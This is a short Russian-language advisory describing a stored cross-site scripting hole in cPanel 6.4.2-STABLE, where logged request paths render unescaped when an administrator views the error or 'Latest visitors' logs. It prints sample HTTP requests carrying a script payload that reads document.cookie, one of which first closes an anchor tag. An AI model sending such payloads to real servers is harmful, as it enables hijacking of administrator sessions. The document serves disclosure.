В запросы, остающиеся в логах cpanel, можно внедрить код, который будет отображен (выполнен) в броузере администратора при просмотре им логов. Пример лога: 

[из errlog.html]
...
<b>Last 300 Error Log Messages in reverse order:</b><hr>
<pre>
[Tue Jun 17 08:41:14 2003] [error] [client x.x.x.x] File does not exist:
/home/dir/public_html/foobar.html
</pre>
... 

Т.о. можно дать что-то типа следующего: 

GET /<script>alert(document.cookie);</script> HTTP/1.0
Host: www.site.com 

Для "Latest visitors" лога тестированной версии (6.4.2-STABLE) нужно предварительно закрыть тег <a>, который автоматом ставится для гиперссылок:

GET /"></a><script>alert(document.cookie);</script> HTTP/1.0
Host: www.site.com

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии